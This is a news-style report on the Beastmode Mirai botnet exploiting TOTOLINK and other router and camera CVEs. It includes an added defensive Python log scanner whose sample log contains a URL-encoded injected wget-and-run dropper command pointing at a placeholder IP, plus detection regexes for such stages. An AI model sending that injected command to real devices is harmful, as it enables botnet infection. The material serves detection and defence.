Between February and March 2022, a variant of the Mirai botnet known as Beastmode was seen exploiting recently reported vulnerabilities in TOTOLINK routers in order to infect unpatched devices and potentially expand its reach.
As the FortiGuard Labs Research team has explained, the Beastmode (also known as B3astmode) Mirai-based DDoS operation has actively expanded the arsenal of vulnerabilities it targets. Within a single month, five more vulnerabilities were added to that arsenal, including three that target many different TOTOLINK router models, according to the researchers.
Here is a list of the vulnerabilities that have been exploited in TOTOLINK routers:
- CVE-2022-26210 (CVSS score: 9.8) – An arbitrary code execution vulnerability that could be exploited to gain access to a system’s configuration data.
- CVE-2022-26186 (CVSS score: 9.8) – A command injection vulnerability affecting the TOTOLINK N600R and A7100RU routers.
- CVE-2022-25075 to CVE-2022-25084 (CVSS scores: 9.8) – A set of command injection vulnerabilities affecting a large number of TOTOLINK routers, which could lead to code execution.
Aside from brute-forcing credentials, Beastmode is also targeting flaws in TP-Link Tapo C200 IP cameras (CVE-2021-4045, CVSS score: 9.8), Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8), video surveillance solutions from NUUO and Netgear (CVE-2016-5674, CVSS score: 9.8), and D-Link products (CVE-2021-45382, CVSS score: 9.8).
Although they affect a wide range of products, these vulnerabilities all share one trait: they allow threat actors to inject commands that are executed once exploitation succeeds. In most cases this means using the wget command to fetch shell scripts, which then infect the device with Beastmode; the scripts delivered differ slightly from one attack to another.
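A defender-side illustration of the pattern described above (an injected command separator followed by a wget-style download-and-run stage), as an added example that is not part of the original report; the log lines, endpoints and addresses below are constructed placeholders, not TOTOLINK paths or real indicators:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the article). The CGI paths and
# IP addresses are placeholders from documentation ranges, not real TOTOLINK endpoints.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2022:10:01:02 +0000] "GET /cgi-bin/placeholder.cgi?host=192.0.2.1 HTTP/1.1" 200 311
203.0.113.9 - - [12/Mar/2022:10:01:05 +0000] "GET /cgi-bin/placeholder.cgi?host=192.0.2.1%3Bwget+http%3A%2F%2F198.51.100.5%2Fb3.sh+-O+%2Ftmp%2Fb3.sh%3Bsh+%2Ftmp%2Fb3.sh HTTP/1.1" 200 311
203.0.113.9 - - [12/Mar/2022:10:01:06 +0000] "POST /cgi-bin/placeholder2.cgi HTTP/1.1" 200 90
198.51.100.20 - - [12/Mar/2022:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 4012
"""

# Shell metacharacters that end the intended argument and start an injected command.
INJECTION_SEP = re.compile(r"[;&|`$\n]")
# Download-then-execute stage typical of the Mirai-family droppers the article describes.
DROPPER = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*\b(sh|bash|chmod)\b", re.IGNORECASE)
# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Return a dict for one access-log line, with the request target URL-decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method,
            "target": unquote_plus(target), "status": int(status)}


def is_dropper_injection(target):
    """True if the decoded request target has a command separator followed by a fetch-and-run stage."""
    sep = INJECTION_SEP.search(target)
    if not sep:
        return False
    return bool(DROPPER.search(target[sep.start():]))


def find_dropper_attempts(log_text):
    """Return the parsed records whose request target looks like a dropper injection."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_dropper_injection(rec["target"]):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in find_dropper_attempts(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["target"]}')
```

A hit only says the request carried the pattern; whether the device was actually compromised depends on the firmware version, so pair this with the vendor's advisory and outbound-connection logs from the router.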
Users of affected devices are urgently advised to upgrade their firmware to the most recent version to avoid having those devices taken over by the botnet.
Although the original Mirai author was arrested in 2018, the latest attack campaign demonstrates how threat actors, such as those behind Beastmode, continue to rapidly incorporate newly published exploit code into their campaigns to infect unpatched devices with the Mirai malware, the researchers explained.